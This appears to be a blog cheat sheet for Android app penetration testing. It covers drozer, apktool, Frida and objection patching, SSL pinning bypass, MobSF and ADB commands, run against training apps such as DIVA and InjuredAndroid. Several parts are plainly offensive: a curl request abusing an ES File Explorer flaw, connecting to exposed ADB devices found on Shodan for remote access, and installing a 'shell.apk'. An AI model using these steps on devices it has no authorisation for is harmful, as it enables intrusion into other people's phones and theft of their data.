Port Scan on Android
as many random ports can be open on Android devices, its always better to scan all the ports using
https://github.com/RustScan/RustScan/releases
download the debian package
dpkg -i filename
rustscan -a 10.10.10.247
now scan all the open ports with nmap -sC -sV to run default script and for version scan.
Installing ADB
sudo apt-get install android-tools-adb
Setting up Drozer
#Installing drozer on docker
docker pull withsecurelabs/drozer
#Downlaod the drozer Agent and install it on android
download from https://github.com/WithSecureLabs/drozer-agent/releases/tag/3.0.0
#Drag and drop on emulator or install via adb
adb install drozer-agent.apk
#on Windows setup port forwarding for emulator
adb forward tcp:31415 tcp:31415
#Get a docker shell
docker run --net host -it --entrypoint sh withsecurelabs/drozer
#inside the container, start drozer
drozer console connect --server host.docker.internal
# Method - II
#Find the IP Address in about
#Connect the Android using IP address
docker run --net host -it withsecurelabs/drozer console connect --server 10.10.10.10
#Get a shell
docker run --net host -it --entrypoint sh withsecurelabs/drozer
drozer console connect --server <phone IP address>
Drozer Commands
#list all functionality
list
#List packages
run app.package.list
#Filter for a specific app keyword
run app.package.list -f diva
#Basic info
run app.package.info -a jakhar.aseem.diva
#List About activates, broadcast, content providers and services
run app.package.attacksurface jakhar.aseem.diva
#If the App as Exported Activity
#Get Activity info
run app.activity.info -a jakhar.aseem.diva
#View/Access the exported activity if Permission: null
run app.activity.start --component jakhar.aseem.diva jakhar.aseem.diva.APICreds2Activity
run app.activity.start --component app.package app.activy.path
#You can open the exported actvity directly from adb shell
adb shell am start -n jakhar.aseem.diva.APICreds2Activity
#If the app has providers
#Get info on content providers
run app.provider.info -a jakhar.aseem.diva
#Run Scanner to find provider urls
#Take the content urls which are under "For Sure Accessible Content URIs"
run scanner.provider.finduris -a jakhar.aseem.diva
#Query a provider url
run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes/
#Look for Injection vulnerabilities in an app
run scanner.provider.injection -a jakhar.aseem.diva
#Automatically exploit SLQ Injection - print tables
run scanner.provider.sqltables -a jakhar.aseem.diva
Static Analysis
#Decompile the application
apktool d appication.apk
#Decompile without resources, use when the app is too huge
apktool d application.apk -r
#Search for strings in all locations
#Even lib directory can contain some useful source code an API key
#Use Strings on .so/ELF files
#smali directory contains the source code - but its not in readable format, need to use dex to jar converter
Locations to check for Secrets
- resources/res/values/strings.xml, xmls.xml, integers.xml, attrs.xml - find below strings
- firebase_database_url
- google_api_key
- google_app_id
- google_crash_reporting_api_key
- google_storage_bucket
- client_id
- API
- password
- AWS
- Secret
- http:// or https://
- .db or .sqllite or SQL
or better use jadx-gui from
https://github.com/skylot/jadx/releases/tag/v1.5.0
In Android Manifest.xml keywords to Look for
- API Keys
- Providers - Content Providers; find ones which are exported
- SdkVersion
- Permissions
#Activites with export=true can be started/opened from adb shell by running the command - just add a / before .activityname
am start b3nac.injuredandroid/.b25lActivity
# Make sure there is no sensitive data in the activity where exported=true
- exported="true" - Activities.
- backup -- Application is saving some backup data when running - should be on the top
- Debug
AWS Enumeration
use Cloud Enum tool - available on github
Firebase DB Enum
- see if you can find a firebase url in the source code, if yes try going to it and see what you can find there
- dirb it and find any exposed content
- find the DB on the apk
Use https://github.com/Sambal0x/firebaseEnum
git clone https://github.com/Sambal0x/firebaseEnum.git
cd firebaseEnum
python -m pip install -r requirements.txt
python3 firebaseEunm.py -k APK_Name
Abusing ES File Explorer Vuln
Exploiting can be downloaded from here
or can use curl to abuse it
curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://192.168.0.105:59777
Installing and Setting up Frida & Objection
python -m pip install setuptools
python -m pip install frida-tools
python -m pip install objection
add this path to env PATH - Update as required "C:\Users\name\AppData\Local\Android\Sdk\build-tools\34.0.0"
#patch the apk with objection first, if that doenst work patch it with frida manually
#A new apk is generated in the same directory with name.objection.apk
#Drag and drop the new apk into android emulator, Uninstall the original apk and install the new patched apk.
objection patchapk --source injuredAndroid.apk
Patching Manually using Frida
You can follow this tutorialtutorial
#Decompile without resources, use when the app is too huge
apktool d application.apk -r
#Go to lib directory of the apk and go to appropriate architecture of the emulator
APK_NAME/lib/x86_64/
go to Frida Releases and download the appropriate gadget
frida-gadget-16.3.3-android-x86_64.so.xz
#Rename the file to libfrida-gadget.so or frida-gadget.so (based on the libraries naming convention) and copy the file into APK_NAME/lib/x86_64/
#Paste the below code into any smali file which you know loads for sure - Example: MainActivity.smali under /APK_NAME/smali/COmpany/APK_NAME/ (Ex: injuredAndroid/smali/b3nac/injuredandroid/) and save it.
const-string v0, "frida-gadget"
invoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V
#Add the Internet permission to the manifest if it’s not there already, so that Frida gadget can open a socket.
<uses-permission android:name="android.permission.INTERNET" />
#ReBuild the apk
apktool b injuredAndroid -o inured_patched.apk
apktool b DirectoryPath -o Output.apk
#Sign the APK
keytool -genkey -v -keystore custom.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore custom.keystore -storepass password inured_patched.apk mykeyaliasname
jarsigner -verify inured_patched.apk
# Installing zipalign
nano /etc/apt/sources.list
#comment the kali apt source and add the below line
deb http://ftp.de.debian.org/debian buster main
sudo apt update
sudo apt install zipalign
zipalign 4 inured_patched.apk inured_final.apk
#Drag and drop the final apk into emulator and start the apk
#Start objection to run the apk
objection explore
#Disable ssl pinning
android sslpinning disable
Dynamic Analysis with MobSF
#for Linux
download MobSF and run setup.sh then run.sh
#for Windows
Download docker from https://docs.docker.com/desktop/install/windows-install/
#Setup MobSF
docker pull opensecurity/mobile-security-framework-mobsf:latest
#Run MobSF
docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
#or add a new env variable
Variable name: mobsf
Variable Value: docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
from now on type on cmd to run mobsf on docker
%mobsf%
#Access the application using creds mobsf/mobsf
http://127.0.0.1:8000/login/
#Add below path to Environmental variables PATH
C:\Users\Bhanu\AppData\Local\Android\Sdk\emulator
ADB Commands
ADB Cheatsheet is here
#Port forward a port from the Android device to ADB
sudo ssh -p 22 -L 5555:127.0.0.1:5555 bhanu@steins.local
#Connect to a device over wireless
adb tcpip 9090
#connect to the service
adb connect 127.0.0.1:5555
#list connected devices
adb devices
#get a shell from a selected device
#adb -s device_name shell
adb -s 127.0.0.1:5555 shell
#get a shell
adb shell
#get root privs from a shell
su
#install an apk
adb -s "25sdfsfb3801745eg" install "C:\Users\bhanu\Downloads\shell.apk"
#Getting screenshots
adb shell screencap <path to save>
#Recording the screen
adb shell screenrecord <path to save>
#Downloading files
adb pull <source file path> <destination file path>
#Uploading files
adb push <source file path> <destination file path>
#Visiting websites
adb shell am start -a android.intent.action.VIEW -d <URL of the website>
#Getting system information
getprop
Find and Download an APK from Android
adb devices
adb shell pm list packages | findstr appname
adb shell pm path com.appname
adb pull /data/app/~~jdOUJ5SxYWTgxtJXoghLTQ==/com.appname-LQcPJpxkhQL8gBcSOfevvg==/base.apk
adb pull /data/app/~~jdOUJ5SxYWTgxtJXoghLTQ==/com.appname-LQcPJpxkhQL8gBcSOfevvg==/split_config.xxhdpi.apk
Commands inside ADB Shell
#List Available packages
pm list packages
# Find a specific package
pm list packages | grep Name
# Find the path of the package
pm path full_packageName
pm path b3nac.injuredandroid
package:/data/app/b3nac.injuredandroid-1/base.apk
# Download the apk back into the main host machine
#exit out of the adb shell
exit
adb pull /data/app/b3nac.injuredandroid-1/base.apk injuredAndroid.apk
#incase you have multiple emulators open
adb -s emulator-5556 pull /data/app/b3nac.injuredandroid-1/base.apk injuredAndroid.apk
# you can now open the apk for static analysis
Finding Devices on Shodan
android debug bridge
adb connect 100.100.100.100:5555
Get Remote Access of a device
apt install scrcpy
scrcpy
Comments
Post a Comment